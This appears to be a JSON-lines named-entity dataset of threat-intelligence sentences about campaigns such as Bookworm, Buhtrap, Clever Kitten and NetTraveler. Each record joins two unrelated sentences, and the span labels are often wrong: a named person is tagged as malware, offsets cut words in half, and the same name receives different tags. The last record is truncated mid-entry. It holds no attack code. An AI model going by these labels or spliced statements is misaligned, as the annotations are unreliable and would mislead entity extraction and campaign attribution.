The campaign code \" 20150920 \" is associated with this decoy , which is a week prior to media articles announcing that the Crown Price of Thailand Maha Vajiralongkorn will lead the Bike for Dad 2015 event .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 31, "end": 38, "label": "System"}, {"start": 47, "end": 88, "label": "Malware"}, {"start": 179, "end": 184, "label": "Organization"}]} {"text": "The SHAPESHIFT wiper is capable of wiping disks and volumes , as well as deleting files . Chitpas is heavily involved with Thailand politics and was a core leader of the People 's Committee for Absolute Democracy ( PCAD ) , which is an organization that staged anti-government campaigns in 2013 and 2014 .", "spans": [{"start": 4, "end": 20, "label": "System"}, {"start": 35, "end": 59, "label": "Malware"}, {"start": 73, "end": 87, "label": "Malware"}, {"start": 132, "end": 140, "label": "Organization"}, {"start": 170, "end": 212, "label": "Organization"}, {"start": 215, "end": 219, "label": "Organization"}]} {"text": "The HTA files contained job descriptions and links to job postings on popular employment websites . The final remaining known decoy includes photos of Chitpas Tant Kridakon ( Figure 7 ) , who is known as heiress to the largest brewery in Thailand .", "spans": [{"start": 4, "end": 13, "label": "Malware"}, {"start": 14, "end": 50, "label": "Malware"}, {"start": 126, "end": 131, "label": "Malware"}, {"start": 151, "end": 172, "label": "Malware"}]} {"text": "The attacker used a spear-phishing email containing a link to a fake resume hosted on a legitimate website that had been compromised . These images were associated with the Bookworm campaign code \" 20150905 \" .", "spans": [{"start": 4, "end": 12, "label": "Organization"}, {"start": 41, "end": 58, "label": "Malware"}]} {"text": "Further analysis revealed a well-established collection of fake social media profiles that appear intended to build trust and rapport with potential victims . 
Unit 42 analyzed the systems communicating with the Bookworm C2 domains and found that a majority of the IP addresses existed within autonomous systems located in Thailand .", "spans": [{"start": 64, "end": 76, "label": "Organization"}, {"start": 110, "end": 121, "label": "Malware"}, {"start": 126, "end": 156, "label": "Malware"}, {"start": 159, "end": 166, "label": "Organization"}, {"start": 211, "end": 219, "label": "Malware"}, {"start": 220, "end": 222, "label": "System"}, {"start": 264, "end": 266, "label": "Indicator"}]} {"text": "The macro ran a PowerShell command that attempted to download additional PowerShell loader scripts for PupyRAT , a research and penetration-testing tool that has been used in attacks . The pie chart in Figure 8 shows that the vast majority ( 73% ) of the hosts are geographically located in Thailand , which matches the known targeting of this threat group .", "spans": [{"start": 16, "end": 34, "label": "System"}, {"start": 53, "end": 98, "label": "Malware"}, {"start": 103, "end": 110, "label": "System"}, {"start": 115, "end": 152, "label": "System"}]} {"text": "ChopShop1 is a new framework developed by the MITRE Corporation for network-based protocol decoders that enable security professionals to understand actual commands issued by human operators controlling endpoints . We believe that the IP addresses from Canada , Russia and Norway are analysis systems of antivirus companies or security researchers .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 46, "end": 63, "label": "Organization"}, {"start": 105, "end": 134, "label": "Malware"}, {"start": 235, "end": 237, "label": "Indicator"}, {"start": 304, "end": 323, "label": "Organization"}]} {"text": "Poison Ivy is a remote access tool that is freely available for download from its official web site at www.poisonivy-rat.com . 
Overall , the Bookworm infrastructure overlaps with the infrastructure hosting C2 servers used by various attack tools , including FFRAT , Poison Ivy , PlugX , and others .", "spans": [{"start": 0, "end": 10, "label": "System"}, {"start": 16, "end": 29, "label": "Malware"}, {"start": 141, "end": 149, "label": "Malware"}, {"start": 206, "end": 208, "label": "System"}, {"start": 258, "end": 263, "label": "Malware"}, {"start": 266, "end": 276, "label": "Malware"}, {"start": 279, "end": 284, "label": "Malware"}]} {"text": "Poison Ivy includes features common to most Windows-based RATs , including key logging , screen capturing , video capturing , file transfers , system administration , password theft , and traffic relaying . Overall , the Bookworm infrastructure overlaps with the infrastructure hosting C2 servers used by various attack tools , including FFRAT , Poison Ivy , PlugX , and others .", "spans": [{"start": 0, "end": 10, "label": "System"}, {"start": 58, "end": 62, "label": "System"}, {"start": 75, "end": 86, "label": "Malware"}, {"start": 89, "end": 105, "label": "Malware"}, {"start": 108, "end": 123, "label": "Malware"}, {"start": 126, "end": 140, "label": "Malware"}, {"start": 143, "end": 164, "label": "Malware"}, {"start": 167, "end": 181, "label": "Malware"}, {"start": 188, "end": 204, "label": "Malware"}, {"start": 221, "end": 229, "label": "Malware"}, {"start": 286, "end": 288, "label": "System"}, {"start": 338, "end": 343, "label": "Malware"}, {"start": 346, "end": 356, "label": "Malware"}, {"start": 359, "end": 364, "label": "Malware"}]} {"text": "The Poison Ivy builder kit allows attackers to customize and build their own PIVY server , which is delivered as mobile code to a target that has been compromised , typically using social engineering . 
Unit 42 enumerated the threat infrastructure related to Bookworm and created a chart to visualize connected entities to its current attack campaign .", "spans": [{"start": 4, "end": 14, "label": "System"}, {"start": 34, "end": 43, "label": "Organization"}, {"start": 47, "end": 88, "label": "Malware"}, {"start": 181, "end": 199, "label": "Organization"}, {"start": 202, "end": 209, "label": "Organization"}, {"start": 258, "end": 266, "label": "Malware"}]} {"text": "We found new variants of the Powermud backdoor , a new backdoor ( Backdoor.Powemuddy ) , and custom tools for stealing passwords , creating reverse shells , privilege escalation , and the use of the native Windows cabinet creation tool , makecab.exe , probably for compressing stolen data to be uploaded . Threat actors have targeted the government of Thailand and delivered the newly discovered Bookworm Trojan since July 2015 .", "spans": [{"start": 29, "end": 46, "label": "System"}, {"start": 66, "end": 84, "label": "Malware"}, {"start": 93, "end": 105, "label": "System"}, {"start": 110, "end": 128, "label": "Malware"}, {"start": 131, "end": 154, "label": "Malware"}, {"start": 157, "end": 177, "label": "Malware"}, {"start": 188, "end": 235, "label": "Malware"}, {"start": 238, "end": 249, "label": "Malware"}, {"start": 338, "end": 348, "label": "Organization"}, {"start": 396, "end": 411, "label": "Malware"}]} {"text": "Like the previous campaigns , these samples again involve a Microsoft Word document embedded with a malicious macro that is capable of executing PowerShell ( PS ) scripts leading to a backdoor payload . 
The actors appear to follow a set playbook , as the observed TTPs are fairly static within each attack in this campaign .", "spans": [{"start": 60, "end": 83, "label": "Malware"}, {"start": 171, "end": 200, "label": "Malware"}]} {"text": "Taking a step back , as discussed in the Appendix in our initial OilRig blog , Clayslide delivery documents initially open with a worksheet named \" Incompatible \" that displays content that instructs the user to \" Enable Content \" to see the contents of the document , which in fact runs the malicious macro and compromises the system . So far , Unit 42 has seen infrastructure overlaps with servers hosting C2 servers for samples of the FFRAT , PlugX , Poison Ivy and Scieron Trojans , suggesting that the threat actors use these tools as the payload in their attacks .", "spans": [{"start": 65, "end": 71, "label": "Organization"}, {"start": 79, "end": 107, "label": "Malware"}, {"start": 283, "end": 307, "label": "Malware"}, {"start": 312, "end": 334, "label": "Malware"}, {"start": 346, "end": 353, "label": "Organization"}, {"start": 408, "end": 410, "label": "System"}, {"start": 438, "end": 443, "label": "Malware"}, {"start": 446, "end": 451, "label": "Malware"}, {"start": 454, "end": 464, "label": "Malware"}, {"start": 469, "end": 484, "label": "Malware"}]} {"text": "The vulnerability exists in the old Equation Editor ( EQNEDT32.EXE ) , a component of Microsoft Office that is used to insert and evaluate mathematical formulas . The threat actors have continually used Flash Player installers and Flash slideshows for decoys .", "spans": [{"start": 36, "end": 51, "label": "System"}, {"start": 54, "end": 66, "label": "Malware"}, {"start": 119, "end": 160, "label": "Malware"}, {"start": 203, "end": 226, "label": "Malware"}, {"start": 231, "end": 247, "label": "Malware"}]} {"text": "ISMDoor is able to exfiltrate data , take screenshots , and execute arbitrary commands on the victim 's machine . 
The vast majority of systems communicating with Bookworm C2 servers are within the Bangkok metropolitan LOC where a majority of the government of Thailand exists .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 19, "end": 34, "label": "Malware"}, {"start": 37, "end": 53, "label": "Malware"}, {"start": 60, "end": 86, "label": "Malware"}, {"start": 162, "end": 170, "label": "Malware"}, {"start": 171, "end": 173, "label": "System"}, {"start": 246, "end": 256, "label": "Organization"}]} {"text": "The attackers then began to perform reconnaissance activities on Computer A via cmd.exe , collecting system-related information , such as the OS version , hardware configuration , and network information . Buhtrap has been active since 2014 , however their first attacks against financial institutions were only detected in August 2015 .", "spans": [{"start": 80, "end": 87, "label": "Malware"}, {"start": 90, "end": 127, "label": "Malware"}, {"start": 206, "end": 213, "label": "Organization"}, {"start": 279, "end": 301, "label": "Organization"}]} {"text": "Based on the command capabilities of the Taidoor malware , we were able to determine that data theft and data destruction was possible . At the moment , the group is known to target Russian and Ukrainian banks .", "spans": [{"start": 41, "end": 56, "label": "System"}, {"start": 90, "end": 100, "label": "Malware"}, {"start": 105, "end": 121, "label": "Malware"}, {"start": 204, "end": 209, "label": "Organization"}]} {"text": "This script relays commands and output between the controller and the system . 
Buhtrap is the first hacker group using a network worm to infect the overall bank infrastructure that significantly increases the difficulty of removing all malicious functions from the network .", "spans": [{"start": 12, "end": 38, "label": "Malware"}, {"start": 79, "end": 86, "label": "Organization"}, {"start": 156, "end": 160, "label": "Organization"}]} {"text": "But two tools used were unique to the group : ASPXTool , an Internet Information Services ( IIS ) specific \" Web shell \" used to gain access to servers inside a target 's network ; and the OwaAuth credential stealing tool and Web shell , used to attack Microsoft Exchange servers running the Web Outlook interface . Malicious programs intentionally scan for machines with an automated Bank-Customer system of the Central bank of Russia ( further referred to as BCS CBR ) .", "spans": [{"start": 46, "end": 54, "label": "System"}, {"start": 129, "end": 151, "label": "Malware"}, {"start": 189, "end": 221, "label": "System"}, {"start": 226, "end": 235, "label": "System"}, {"start": 421, "end": 425, "label": "Organization"}]} {"text": "PsExec is a Microsoft Sysinternals tool for executing processes on other systems and is one of the most frequently seen legitimate pieces of software used by attackers attempting to live off the land . If the document was delivered with macros instead of exploits ( CVE-2012-0158 , CVE-2013-3906 or CVE-2014-1761 ) , then the document contained instructions for enabling macros .", "spans": [{"start": 0, "end": 6, "label": "System"}, {"start": 44, "end": 63, "label": "Malware"}, {"start": 266, "end": 279, "label": "Vulnerability"}, {"start": 282, "end": 295, "label": "Vulnerability"}, {"start": 299, "end": 312, "label": "Vulnerability"}]} {"text": "Catchamas is a custom Trojan designed to steal information from an infected computer and contains additional features designed to avoid detection . 
We noticed that criminals were spreading Buhtrap using this method from May 2015 to August 2015 .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 41, "end": 58, "label": "Malware"}, {"start": 189, "end": 196, "label": "Organization"}]} {"text": "As detailed in the previous section , this malware is able to manipulate and exfiltrate emails . It is worth noting that attackers used the same compromised websites to spread Buhtrap as those that had been used for the Corkow Trojan .", "spans": [{"start": 62, "end": 94, "label": "Malware"}, {"start": 145, "end": 165, "label": "Malware"}, {"start": 176, "end": 183, "label": "Malware"}, {"start": 220, "end": 233, "label": "Malware"}]} {"text": "Kazuar generates its mutex by using a process that begins with obtaining the MD5 hash of a string \" [username]=>singleton-instance-mutex \" . Moreover , they used the same exploit kit Niteris as that in the Corkow case .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 7, "end": 26, "label": "Malware"}, {"start": 171, "end": 178, "label": "Vulnerability"}, {"start": 179, "end": 190, "label": "Vulnerability"}, {"start": 206, "end": 212, "label": "Malware"}]} {"text": "MXI Player appears to be a version of the Bahamut agent , designed to record the phone calls and collect other information about the user ( com.mxi.videoplay ) . Purportedly during one of the first attacks hackers intercepted the mailing list of the Anti-drop \" club and created a specific phishing email for its members .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 70, "end": 92, "label": "Malware"}, {"start": 97, "end": 122, "label": "Malware"}]} {"text": "Using XREFs during static analysis is a common technique to quickly find where functions of interest are called . 
However , it is still widely used , notably in Russia .", "spans": [{"start": 6, "end": 11, "label": "System"}, {"start": 68, "end": 100, "label": "Malware"}]} {"text": "Although the developers of Bookworm have included only keylogging functionality in Bookworm as a core ability , as suggested in Table 1 , several of the embedded DLLs provide Leader with cryptographic and hashing functions , while others support Leader 's ability to communicate with its C2 server . As noted in our previous blog on Buhtrap , this gang has been actively targeting Russian businesses , mostly through spear-phishing .", "spans": [{"start": 27, "end": 35, "label": "System"}, {"start": 83, "end": 91, "label": "System"}, {"start": 167, "end": 181, "label": "Malware"}, {"start": 246, "end": 252, "label": "System"}, {"start": 267, "end": 297, "label": "Malware"}, {"start": 389, "end": 399, "label": "Organization"}]} {"text": "As mentioned in our previous blog on Bookworm , the Trojan sends a static date string to the C2 server that we referred to as a campaign code . It is thus interesting to see Buhtrap add strategic web compromises to their arsenal .", "spans": [{"start": 37, "end": 45, "label": "System"}, {"start": 52, "end": 58, "label": "System"}, {"start": 59, "end": 85, "label": "Malware"}]} {"text": "We believed that the actors would use this date code to track their attack campaigns ; however , after continued analysis of the malware , we think these static dates could also be a build identifier for the Trojan . The first malware we saw was the lurk downloader , which was distributed on October 26th .", "spans": [{"start": 43, "end": 52, "label": "System"}, {"start": 183, "end": 199, "label": "Malware"}, {"start": 250, "end": 265, "label": "Malware"}]} {"text": "Threat actors may use the date string hardcoded into each Bookworm sample as a build identifier . 
The executable would install the real Ammyy product , but would also launch a file called either AmmyyService.exe or AmmyySvc.exe which contained the malicious payload .", "spans": [{"start": 26, "end": 47, "label": "Malware"}, {"start": 58, "end": 73, "label": "System"}, {"start": 79, "end": 95, "label": "Malware"}, {"start": 195, "end": 211, "label": "Indicator"}, {"start": 215, "end": 227, "label": "Indicator"}]} {"text": "A Trojan sending a build identifier to its C2 server is quite common , as it notifies the threat actors of the specific version of the Trojan in which they are interacting . Buhtrap is getting better at disguising the code they inject into compromised websites .", "spans": [{"start": 19, "end": 35, "label": "Malware"}, {"start": 77, "end": 85, "label": "Malware"}, {"start": 174, "end": 181, "label": "Organization"}, {"start": 240, "end": 260, "label": "Malware"}]} {"text": "Due to these changes without a new date string , we believe the date codes are used for campaign tracking rather than a Bookworm build identifier . With the recent arrests of actors using the Lurk banking trojan , Buhtrap appears to be a likely alternative for actors wishing to target Russian banks and software .", "spans": [{"start": 35, "end": 46, "label": "Malware"}, {"start": 64, "end": 74, "label": "Malware"}, {"start": 88, "end": 105, "label": "Malware"}, {"start": 120, "end": 128, "label": "System"}, {"start": 192, "end": 211, "label": "Malware"}, {"start": 294, "end": 299, "label": "Organization"}]} {"text": "We believe that Bookworm samples use the static date string as campaign codes , which we used to determine the approximate date of each attack that we did not have detailed targeting information . 
They have different functions and ACTs of spreading , but the same purpose \u2014 to steal money from the accounts of businesses .", "spans": [{"start": 16, "end": 32, "label": "System"}, {"start": 33, "end": 59, "label": "Malware"}, {"start": 310, "end": 320, "label": "Organization"}]} {"text": "Malicious programs intentionally scan for machines with an automated Bank-Customer system of the Central bank of Russia ( further referred to as BCS CBR ) . Our experts have found that cybercriminals are actively focusing on SMBs , and giving particular attention to accountants .", "spans": [{"start": 33, "end": 50, "label": "Malware"}, {"start": 105, "end": 109, "label": "Organization"}, {"start": 225, "end": 229, "label": "Malware"}, {"start": 267, "end": 278, "label": "Organization"}]} {"text": "In addition to built-in functionalities , the operators of Careto can upload additional modules which can perform any malicious task . The first encounter with Buhtrap was registered back in 2014 .", "spans": [{"start": 59, "end": 65, "label": "Malware"}, {"start": 70, "end": 95, "label": "Malware"}]} {"text": "Tweety Chat 's Android version can record audio , too . For now , we can call RTM one of the most active financial Trojans .", "spans": [{"start": 0, "end": 11, "label": "System"}, {"start": 35, "end": 47, "label": "Malware"}, {"start": 78, "end": 81, "label": "Malware"}, {"start": 105, "end": 114, "label": "Organization"}]} {"text": "One of its file stealers , swissknife2 , abuses a cloud storage service as a repository of exfiltrated files . 
At that time it was the name of a cybercriminal group that was stealing money from Russian financial establishments \u2014 to the tune of at least $150,000 per hit .", "spans": [{"start": 27, "end": 38, "label": "System"}, {"start": 41, "end": 71, "label": "Malware"}, {"start": 202, "end": 226, "label": "Organization"}]} {"text": "The CONFUCIUS_B executable is disguised as a PowerPoint presentation , using a Right-To-Left-Override ( RTLO ) trick and a false icon . Buhtrap resurfaced in the beginning of 2017 in the TwoBee campaign , where it served primarily as means of malware delivery .", "spans": [{"start": 4, "end": 15, "label": "Malware"}, {"start": 30, "end": 68, "label": "Malware"}, {"start": 71, "end": 101, "label": "Malware"}, {"start": 104, "end": 108, "label": "System"}, {"start": 123, "end": 133, "label": "Malware"}]} {"text": "The Android version , for instance , can steal SMS messages , accounts , contacts , and files , as well as record audio . After the source codes of their tools became public in 2016 , the name Buhtrap was used for the financial Trojan .", "spans": [{"start": 4, "end": 19, "label": "Malware"}, {"start": 41, "end": 59, "label": "Malware"}, {"start": 62, "end": 70, "label": "Malware"}, {"start": 73, "end": 81, "label": "Malware"}, {"start": 88, "end": 93, "label": "Malware"}, {"start": 107, "end": 119, "label": "Malware"}, {"start": 218, "end": 234, "label": "Malware"}]} {"text": "If a bot was installed on a network that was of interest to the hacking group , this bot was then used to upload one of the remote access programs . 
Just like last time , Buhtrap is spreading through exploits embedded in news outlets .", "spans": [{"start": 5, "end": 8, "label": "Malware"}, {"start": 106, "end": 146, "label": "Malware"}, {"start": 221, "end": 233, "label": "Organization"}]} {"text": "To obtain logins and passwords they applied keyloggers built into Corkow , as well as a commonly used feature of Mimikatz , dumping clear text Windows credentials from LSA . Estimating the damages is challenging , but as we learned , the criminals are siphoning off assets in transactions that do not exceed $15,000 each .", "spans": [{"start": 3, "end": 30, "label": "Malware"}, {"start": 44, "end": 54, "label": "System"}, {"start": 66, "end": 72, "label": "System"}, {"start": 97, "end": 121, "label": "Malware"}, {"start": 124, "end": 162, "label": "Malware"}]} {"text": "Palo Alto Networks has noted and described the differences of two malware agents developed in parallel , with commonalities in behavior but differing functionalities ; families described as Infy and Infy M. Our primary observation was of the Infy ( non-M ) malware , which primarily functions as a keylogger for the collection of account credentials . As explained later , we believe this campaign is financially-motivated and that it targets accounting departments in Russian businesses .", "spans": [{"start": 0, "end": 18, "label": "Organization"}, {"start": 190, "end": 194, "label": "System"}, {"start": 199, "end": 206, "label": "System"}, {"start": 242, "end": 246, "label": "System"}, {"start": 257, "end": 264, "label": "System"}, {"start": 298, "end": 307, "label": "System"}, {"start": 316, "end": 349, "label": "Malware"}, {"start": 443, "end": 465, "label": "Organization"}, {"start": 477, "end": 487, "label": "Organization"}]} {"text": "At this stage , the malware gathers information about the infected computer . 
\" Buhgalter \" means \" accountant \" in Russian .", "spans": [{"start": 28, "end": 47, "label": "Malware"}]} {"text": "Initial intrusion stages feature the Win32/Barlaiy implant\u2014notable for its use of social network profiles , collaborative document editing sites , and blogs for C&C . Seeing a campaign like this , inevitably the Anunak/Carbanak documented by Fox-IT and Kaspersky comes to mind .", "spans": [{"start": 37, "end": 50, "label": "System"}, {"start": 75, "end": 105, "label": "Malware"}, {"start": 108, "end": 144, "label": "Malware"}, {"start": 151, "end": 164, "label": "Malware"}, {"start": 212, "end": 227, "label": "Malware"}, {"start": 242, "end": 248, "label": "Organization"}, {"start": 253, "end": 262, "label": "Organization"}]} {"text": "The Windows 10 Creators Update will bring several enhancements to Windows Defender ATP that will provide SOC personnel with options for immediate mitigation of a detected threat . The infection vector is similar , it uses a similar modified mimikatz application , and it uses a third-party remote access tool , changes system settings to allow concurrent RDP sessions , and so on .", "spans": [{"start": 4, "end": 30, "label": "System"}, {"start": 36, "end": 62, "label": "Malware"}, {"start": 66, "end": 86, "label": "Organization"}, {"start": 105, "end": 118, "label": "Organization"}, {"start": 241, "end": 249, "label": "Malware"}, {"start": 278, "end": 308, "label": "Malware"}, {"start": 355, "end": 358, "label": "Malware"}]} {"text": "If it did , the malware downloaded additional modules , including ones allowing for the automatic creation of unauthorized payment orders , changing details in legal payment orders , etc . 
The second , aptly titled \" kontrakt87.doc \" , copies a generic telecommunications service contract from MegaFon , a large Russian mobile phone operator .", "spans": [{"start": 24, "end": 53, "label": "Malware"}, {"start": 71, "end": 106, "label": "Malware"}, {"start": 140, "end": 156, "label": "Malware"}, {"start": 217, "end": 231, "label": "Indicator"}, {"start": 253, "end": 279, "label": "Organization"}, {"start": 294, "end": 301, "label": "Organization"}, {"start": 320, "end": 341, "label": "Organization"}]} {"text": "Lurk uses a form of steganography : that's where one file is hidden away inside another file of a completely different sort , such as an image , audio , or video file . In addition to built-in functionalities , the operators of Careto can upload additional modules which can perform any malicious task .", "spans": [{"start": 0, "end": 4, "label": "System"}, {"start": 61, "end": 92, "label": "Malware"}, {"start": 228, "end": 234, "label": "Indicator"}]} {"text": "To do this , it employs a number of specific commands via DNSMessenger . Careto 's Mask campaign we discovered relies on spear-phishing e-mails with links to a malicious website .", "spans": [{"start": 16, "end": 53, "label": "Malware"}, {"start": 58, "end": 70, "label": "System"}, {"start": 73, "end": 79, "label": "Indicator"}]} {"text": "This document , written in Vietnamese , appears to be reviewing and discussing best practices for teaching and researching scientific topics . 
Sometimes , the attackers use sub-domains on the exploit websites , to make them seem more legitimate .", "spans": [{"start": 5, "end": 13, "label": "Malware"}, {"start": 54, "end": 93, "label": "Malware"}, {"start": 173, "end": 184, "label": "Malware"}, {"start": 192, "end": 199, "label": "Vulnerability"}]} {"text": "There is the exploit code and malware used to gain access to systems , the infrastructure that provides command and control to the malware operator , and the human elements \u2013 developers who create the malware , operators who deploy it , and analysts who extract value from the stolen information . These sub-domains simulate sub-sections of the main newspapers in Spain plus some international ones like the Guardian and the Washington Post .", "spans": [{"start": 13, "end": 25, "label": "Malware"}, {"start": 46, "end": 68, "label": "Malware"}, {"start": 95, "end": 123, "label": "Malware"}, {"start": 350, "end": 360, "label": "Organization"}, {"start": 425, "end": 440, "label": "Organization"}]} {"text": "We believe the 2013 , 2015 , and 2016 KeyBoy samples provide evidence of a development effort focused on changing components that would be used by researchers to develop detection signatures . The CVE-2012-0773 was originally discovered by VUPEN and has an interesting story .", "spans": [{"start": 38, "end": 52, "label": "System"}, {"start": 162, "end": 190, "label": "Malware"}, {"start": 197, "end": 210, "label": "Vulnerability"}]} {"text": "KeyBoy provides basic backdoor functionality , allowing the operators to select from various capabilities used to surveil and steal information from the victim machine . 
In other words , the attackers attracted our attention by attempting to exploit Kaspersky Lab products .", "spans": [{"start": 0, "end": 6, "label": "System"}, {"start": 73, "end": 105, "label": "Malware"}, {"start": 126, "end": 143, "label": "Malware"}, {"start": 242, "end": 249, "label": "Vulnerability"}, {"start": 250, "end": 272, "label": "Malware"}]} {"text": "If KeyBoy is a single component of a larger espionage toolkit , the developers may have realized that this older , static-key based , configuration encoding algorithm was inadvertently providing a link between disparate components of their malware suite . We initially became aware of Careto when we observed attempts to exploit a vulnerability in our products to make the malware \" invisible \" in the system .", "spans": [{"start": 3, "end": 9, "label": "System"}, {"start": 134, "end": 166, "label": "System"}, {"start": 185, "end": 201, "label": "Malware"}, {"start": 285, "end": 291, "label": "Indicator"}, {"start": 321, "end": 328, "label": "Vulnerability"}]} {"text": "The NetTraveler trojan has been known to be used in targeted cyber espionage attacks for more than a decade by nation state threat actors and continues to be used to target its victims and exfiltrate data . Most modules were created in 2012 .", "spans": [{"start": 4, "end": 22, "label": "System"}, {"start": 166, "end": 184, "label": "Malware"}, {"start": 189, "end": 204, "label": "Malware"}]} {"text": "This program is designed to capture keystrokes , take screenshots of the user 's desktop and get contents from the clipboard . The attackers began taking them offline in January 2014 .", "spans": [{"start": 28, "end": 46, "label": "Malware"}, {"start": 49, "end": 65, "label": "Malware"}, {"start": 93, "end": 105, "label": "Malware"}]} {"text": "This file requires the target to attempt to open the .lnk file , which redirects the user to a Windows Scripting Component ( .wsc ) file , hosted on an adversary-controlled microblogging page . 
Last week we discussed Numbered Panda , a group that is also based out of China and is fairly well known to the security community , though by many names .", "spans": [{"start": 53, "end": 62, "label": "Malware"}, {"start": 71, "end": 89, "label": "Malware"}, {"start": 217, "end": 231, "label": "Organization"}, {"start": 306, "end": 324, "label": "Organization"}]} {"text": "Upon successful exploitation , the attachment will install the trojan known as NetTraveler using a DLL side-loading attack technique . We revealed a Chinese-based adversary we crypt as Anchor Panda , a group with very specific tactics , techniques , and procedures ( TTPs ) and a keen interest in maritime operations and naval and aerospace technology .", "spans": [{"start": 35, "end": 45, "label": "Malware"}, {"start": 51, "end": 69, "label": "Malware"}, {"start": 79, "end": 90, "label": "System"}, {"start": 99, "end": 115, "label": "Malware"}, {"start": 185, "end": 197, "label": "Organization"}, {"start": 321, "end": 326, "label": "Organization"}, {"start": 331, "end": 351, "label": "Organization"}]} {"text": "In addition , the NetTraveler toolkit was able to install additional info-stealing malware as a backdoor , and it could be customized to steal other types of sensitive information such as configuration details for an application or computer-aided design files . The campaign was active until January 2014 , but during our investigations the C&C servers were shut down .", "spans": [{"start": 18, "end": 37, "label": "System"}, {"start": 50, "end": 90, "label": "Malware"}, {"start": 137, "end": 179, "label": "Malware"}, {"start": 341, "end": 344, "label": "System"}]} {"text": "The PassCV group typically utilized publicly available RATs in addition to some custom code , which ultimately provided backdoor functionality to affected systems via phony resumes and curriculum vitae ( CVs ) . 
This week we are going to discuss Clever Kitten , whom , by virtue of several indicators , we have affiliated with the Islamic Republic of Iran .", "spans": [{"start": 4, "end": 16, "label": "Organization"}, {"start": 36, "end": 59, "label": "System"}, {"start": 111, "end": 128, "label": "Malware"}]} {"text": "he PassCV group typically utilized publicly available RATs in addition to some custom code , which ultimately provided backdoor functionality to affected systems via phony resumes and curriculum vitae ( CVs ) . Clever Kitten has moved to leveraging strategic web compromises .", "spans": [{"start": 3, "end": 9, "label": "Organization"}, {"start": 35, "end": 58, "label": "System"}, {"start": 110, "end": 127, "label": "Malware"}, {"start": 211, "end": 224, "label": "Organization"}]} {"text": "The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . Clever Kitten actors have a strong affinity for PHP server-side attacks to make access ; this is relatively unique amongst targeted attackers who often favor targeting a specific individual at a specific organization using social engineering .", "spans": [{"start": 4, "end": 9, "label": "Malware"}, {"start": 33, "end": 63, "label": "Vulnerability"}, {"start": 66, "end": 79, "label": "Vulnerability"}, {"start": 120, "end": 132, "label": "Malware"}, {"start": 159, "end": 172, "label": "Organization"}, {"start": 338, "end": 348, "label": "Organization"}, {"start": 382, "end": 400, "label": "Organization"}]} {"text": "One of the most notable functions of the initial dropper is to bypass Windows UAC ( User Account Control ) in order to execute the next payload with higher privileges . 
Clever Kitten primarily targets global companies with strategic importance to countries that are contrary to Iranian interests .", "spans": [{"start": 49, "end": 56, "label": "System"}, {"start": 63, "end": 81, "label": "Malware"}, {"start": 169, "end": 182, "label": "Organization"}]} {"text": "Afterwards , the installer malware creates a downloader and a configuration file from its resource and executes it . A Clever Kitten attack starts with the use of a web vulnerability scanner to conduct reconnaissance .", "spans": [{"start": 35, "end": 55, "label": "Malware"}, {"start": 62, "end": 80, "label": "Malware"}, {"start": 119, "end": 132, "label": "Organization"}, {"start": 165, "end": 190, "label": "Malware"}]} {"text": "The downloader malware uses the configuration file and connects to the C2 server to fetch the next payload . The scanner was identified as the Acunetix Web Vulnerability Scanner which is a commercial penetration testing tool that is readily available as a 14-day trial .", "spans": [{"start": 4, "end": 22, "label": "System"}, {"start": 23, "end": 50, "label": "Malware"}, {"start": 55, "end": 80, "label": "Malware"}, {"start": 143, "end": 177, "label": "Indicator"}]} {"text": "He is responsible for developing tools for conducting attacks and is also able to modify complex exploits and third party software . Once an exploitable page is identified , Clever Kitten will attempt to upload a PHP backdoor to gain remote access to the system .", "spans": [{"start": 22, "end": 38, "label": "Malware"}, {"start": 82, "end": 105, "label": "Malware"}, {"start": 110, "end": 130, "label": "Malware"}]} {"text": "wuaupdt.exe is a CMD backdoor , which can receive and execute CMD commands sent from C2 . 
The reason for this is likely the availability of exploits against web browsers , which for a variety of reasons allows an attacker to bypass security features such as Data Execution Prevention ( DEP ) or Address Space Layout Randomization ( ASLR ) .", "spans": [{"start": 0, "end": 11, "label": "Malware"}, {"start": 17, "end": 20, "label": "System"}, {"start": 42, "end": 49, "label": "Malware"}, {"start": 54, "end": 74, "label": "Malware"}, {"start": 258, "end": 283, "label": "System"}, {"start": 286, "end": 289, "label": "System"}, {"start": 295, "end": 329, "label": "System"}, {"start": 332, "end": 336, "label": "System"}]} {"text": "As described in the infection flow , one of the first uses of the AutoHotKey scripts is to upload a screenshot from the compromised PC . Once an exploitable page is identified , the actor will attempt to upload a PHP backdoor to gain remote access to the system .", "spans": [{"start": 66, "end": 84, "label": "Malware"}, {"start": 91, "end": 110, "label": "Malware"}]} {"text": "The RAT , however , had a multitude of functionalities (as listed in the table below) such as to download and execute , compress , encrypt , upload , search directories , etc . In Clever Kitten 's attacks , the goal is lateral movement ; this is an attempt to move further into the target environment in order to begin intelligence collection .", "spans": [{"start": 4, "end": 7, "label": "Malware"}, {"start": 97, "end": 105, "label": "Malware"}, {"start": 110, "end": 117, "label": "Malware"}, {"start": 120, "end": 128, "label": "Malware"}, {"start": 131, "end": 138, "label": "Malware"}, {"start": 141, "end": 147, "label": "Malware"}, {"start": 150, "end": 168, "label": "Malware"}]} {"text": "Bemstour is specifically designed to deliver a variant of the DoublePulsar backdoor . 
This activity is a longer tail for the actor than a spearphish ; this is likely based on the Clever Kitten background , which may be focused on web development/application testing .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 37, "end": 44, "label": "Malware"}, {"start": 62, "end": 83, "label": "System"}]} {"text": "DoublePulsar is then used to inject a secondary payload , which runs in memory only . Without going too deep into the rabbit hole , there are several indicators pointing to an Iranian nexus , including language artifacts in the tool-marks used by the attacker , as well as network activity tying this actor to a very specific location that we have high confidence in not being spoofed .", "spans": [{"start": 0, "end": 12, "label": "Malware"}, {"start": 29, "end": 35, "label": "Malware"}]} {"text": "The detection evasion techniques we observed in the Okrum malware include embedding the malicious payload within a legitimate PNG image , employing several anti-emulation and anti-sandbox tricks , as well as making frequent changes in implementation . Clever Kitten 's goal is to eventually be able to masquerade as a legitimate user by compromising credentials either through a pass-the-hash attack , or by dumping password hashes from a compromised host .", "spans": [{"start": 52, "end": 57, "label": "Malware"}, {"start": 74, "end": 83, "label": "Malware"}, {"start": 252, "end": 265, "label": 